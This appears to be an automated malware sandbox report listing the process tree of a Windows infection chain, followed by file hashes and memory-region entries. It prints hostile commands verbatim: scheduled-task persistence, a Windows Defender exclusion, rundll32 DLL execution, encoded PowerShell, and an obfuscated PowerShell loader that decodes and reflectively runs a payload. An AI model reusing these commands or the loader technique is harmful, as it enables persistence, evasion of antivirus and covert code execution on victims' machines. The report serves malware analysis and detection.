C:\Users\Admin\AppData\Roaming\yaeblan_v0.7b_2133_windows_64.exe

C:\Users\Admin\AppData\Roaming\yaeblan_v0.7b_2133_windows_64.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 264

C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe

"C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe"

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe" -hq

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~4.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~4.EXE

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 239912 -ip 239912

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 239912 -s 600

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"

C:\Windows\system32\cmd.exe

/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Users\Admin\Pictures\Adobe Films\FWsDwwvaVRZQ.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\FWsDwwvaVRZQ.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe"

C:\Windows\SysWOW64\TapiUnattend.exe

TapiUnattend

C:\Windows\SysWOW64\where.exe

where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /y .\aBiYKZC.31

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Camminato.xla & ping -n 5 localhost

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==

C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 764

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 452

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Calore.sldm & ping -n 5 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4472 -ip 4472

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 812

C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"

C:\Users\Admin\AppData\Local\Temp\is-R890Q.tmp\B2BCH2.exe.tmp

"C:\Users\Admin\AppData\Local\Temp\is-R890Q.tmp\B2BCH2.exe.tmp" /SL5="$501FA,254182,170496,C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 318992 -ip 318992

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 820

C:\Users\Admin\AppData\Local\Temp\is-GALM5.tmp\djkdj778_______.exe

"C:\Users\Admin\AppData\Local\Temp\is-GALM5.tmp\djkdj778_______.exe" /S /UID=91

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 800

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HelloWord.bat.exe

"HelloWord.bat.exe" -noprofile -executionpolicy bypass -command $Sininy = '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';$TThmJnNzyf=')))).Entry';$njMLfacfHE='d([FeNnmb]';$TWdyFFHpsV='$tYMOrf.Le';$puiinoPuUR='vsTFxqtvma';$LdXzmmpbbI='g]::UTF8.G';$VgmFdjtTSa='y));Add-Ty';$LcqwqMbbkB='(, [string';$XLABAnCNaC='Point.Invo';$eSVoGBqqcm='tem.Conver';$HncyZNoqMg='rt]::FromB';$dBNFtIDpED='pe -TypeDe';$pNNYCZutDT='uidcVl;[Sy';$uYiNhweZtY='DJjTd([Sys';$obIPVbiMnt='sL08gQ==''';$lBqjUwIWqJ='88RXWjAUO0';$yyiadSWMup='tring(''19';$rNyVgZJHtt='''C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HelloWord.bat'').Split([Environment]::NewLine);$yYcfRx ';$FngBUvdQey='vert]::Fro';$JARBdjgpdf='ing($Sinin';$JrGPaYqkzv='6TZ/iwZae3';$oyPUjucKWH='se64String';$wJAlKnjnsl='[System.IO';$svBdAUiAtM=' [System.C';$zgADwDAhoI='[]] ('''')))';$FioTOnFZJu='GqngnkIZPv';$vQHOPGWzaK='ase64Strin';$aRAFgJMEqM='FeNnmb]::X';$oytbZiWzCc='$tYMOrf = ';$MOuhLpNOcu='mbly]::Loa';$pBWHwgrjPw='System.Con';$zGuuSjFOsl='romBase64S';$RPBdaQsiWF='stem.Conve';$hGiOUYCmhO='ngth - 1];';$ygLbciMlhu='stem.Refle';$aXQGvVLKHY='ke($null, ';$supxmarUas='xt.Encodin';$GQKzYhYCTY='ction.Asse';$udUaphWlZE='($yYcfRx),';$eVgNeLbhkq='Cor1yU3Byr';$BIxIhDruVr='o=''), [Sy';$xRblTPfDfE='adAllText(';$LbhoOkoave='.File]::Re';$zaprKuJapA='[System.Te';$gNhJMfwFyK='finition $';$BGHbwWihUF='$uidcVl = ';$mzPItvJhEv='t]::FromBa';$xAuMwgrRdz='etString([';$skxdeycnZu='::GRObgc([';$fHYHcSZDbf='mBase64Str';$HAIUrnqfnO='= $tYMOrf[';$NXuXKGdafm='onvert]::F';$WuzCaTPDPk='g(''fwpvFx';Invoke-Expression($oytbZiWzCc + $wJAlKnjnsl + $LbhoOkoave + $xRblTPfDfE + $rNyVgZJHtt + $HAIUrnqfnO + $TWdyFFHpsV + $hGiOUYCmhO + $BGHbwWihUF + $zaprKuJapA + $supxmarUas + $LdXzmmpbbI + $xAuMwgrRdz + $pBWHwgrjPw + $FngBUvdQey + $fHYHcSZDbf + $JARBdjgpdf + $VgmFdjtTSa + $dBNFtIDpED + $gNhJMfwFyK + $pNNYCZutDT + $ygLbciMlhu + $GQKzYhYCTY + $MOuhLpNOcu + $njMLfacfHE + $skxdeycnZu + $aRAFgJMEqM + $uYiNhweZtY + $eSVoGBqqcm + $mzPItvJhEv + $oyPUjucKWH + $udUaphWlZE + 
$svBdAUiAtM + $NXuXKGdafm + $zGuuSjFOsl + $yyiadSWMup + $lBqjUwIWqJ + $eVgNeLbhkq + $puiinoPuUR + $JrGPaYqkzv + $BIxIhDruVr + $RPBdaQsiWF + $HncyZNoqMg + $vQHOPGWzaK + $WuzCaTPDPk + $FioTOnFZJu + $obIPVbiMnt + $TThmJnNzyf + $XLABAnCNaC + $aXQGvVLKHY + $LcqwqMbbkB + $zgADwDAhoI)

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 318992 -ip 318992

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 800

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yimzptac\yimzptac.cmdline"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4108 -ip 4108

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 1156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4368 -ip 4368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 1820

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD59.tmp" "c:\Users\Admin\AppData\Local\Temp\yimzptac\CSC7605DA9E296941508D47B9B04AE6A86E.TMP"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 1360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 984

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 1016

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Mixruzki1.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4472 -ip 4472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 1472

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Mixruzki1.bmp.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 1360

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq PSUAService.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "psuaservice.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 318992 -ip 318992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 1292

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "mixinte.bmp.exe" /f

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^DSFRIKxgXaTKtMXZByrebjRJrDwrxjAhOWIxSGWRcDMpumUWppHSeWRsqWOyIdTLSGVitCiVojGUmHDEJyUkEHlStdzWSRotKwsm$" Avvenne.sldm

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq PSUAService.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Marito.exe.pif

Marito.exe.pif x

C:\Windows\SysWOW64\find.exe

find /I /N "psuaservice.exe"

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^XufIWpJvRqjcIeFiHQtYxsuHNiySwUYnVemDyijdsqGlBBEcpYOSjQXFZIVPtQcWeNAGDwwADOHxLWykDKJryujytTDvkbkAEJiOwYSo$" Nemica.xla

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Plasmare.exe.pif

Plasmare.exe.pif J

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Users\Admin\AppData\Local\Temp\aa-21301-41f-b8583-72d43cc0b3481\SHuhefaruly.exe

"C:\Users\Admin\AppData\Local\Temp\aa-21301-41f-b8583-72d43cc0b3481\SHuhefaruly.exe"

C:\Program Files\Internet Explorer\ZBQOJIFRJS\poweroff.exe

"C:\Program Files\Internet Explorer\ZBQOJIFRJS\poweroff.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-VV2EF.tmp\poweroff.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VV2EF.tmp\poweroff.tmp" /SL5="$8025A,490199,350720,C:\Program Files\Internet Explorer\ZBQOJIFRJS\poweroff.exe" /VERYSILENT

C:\Program Files (x86)\powerOff\Power Off.exe

"C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe /mixfive & exit

C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe /mixfive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 452

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe & exit

C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe

C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe

C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe

C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe

C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe

"C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe" -HELP

C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe

C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 764

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\swncvftv.qwx\rmaa1045.exe & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 772

C:\Users\Admin\AppData\Local\Temp\swncvftv.qwx\rmaa1045.exe

C:\Users\Admin\AppData\Local\Temp\swncvftv.qwx\rmaa1045.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 792

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 560 -p 10916 -ip 10916

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 10916 -s 696

C:\Users\Admin\AppData\Local\Temp\Qzjfjhwisedatarecoveryportable_6_1_22.exe

"C:\Users\Admin\AppData\Local\Temp\Qzjfjhwisedatarecoveryportable_6_1_22.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 11196 -ip 11196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 11196 -s 608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 848

Network


Files

memory/3452-130-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 caf8ca550d3f3d81c5f365fe52b6a968
SHA1 58ffab07a16ab43a29f6c6c7350ad9465e38d7a6
SHA256 1cc768cdba83c2d01b3ddf5a9e1e0c5f27d0e9c46f667bc1625f6897a4509808
SHA512 d21bf6ca63883297963d5ed6599517d9628b3f0bdd7208a48e0b577c20027756b1dbcc99b0194cdd71e60f8d412d3ade703238a36aec9bd8a63b1e45980085b0

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 caf8ca550d3f3d81c5f365fe52b6a968
SHA1 58ffab07a16ab43a29f6c6c7350ad9465e38d7a6
SHA256 1cc768cdba83c2d01b3ddf5a9e1e0c5f27d0e9c46f667bc1625f6897a4509808
SHA512 d21bf6ca63883297963d5ed6599517d9628b3f0bdd7208a48e0b577c20027756b1dbcc99b0194cdd71e60f8d412d3ade703238a36aec9bd8a63b1e45980085b0

memory/3496-133-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/3496-148-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3496-150-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3496-149-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/3496-147-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3496-151-0x00000000007F0000-0x000000000087F000-memory.dmp

memory/3496-153-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3496-154-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3496-156-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3496-157-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3496-155-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3496-158-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3496-159-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3496-160-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3576-161-0x0000000000000000-mapping.dmp

memory/5036-162-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe

MD5 5678604b22617049dc686b524d3b583f
SHA1 98e0fc4a00542239f649459ccf8f6de22cb5e43e
SHA256 9a528cb1e010c11ed92aa9810e0021aee1b7c11e85db13e8b6bf97928c6cac5b
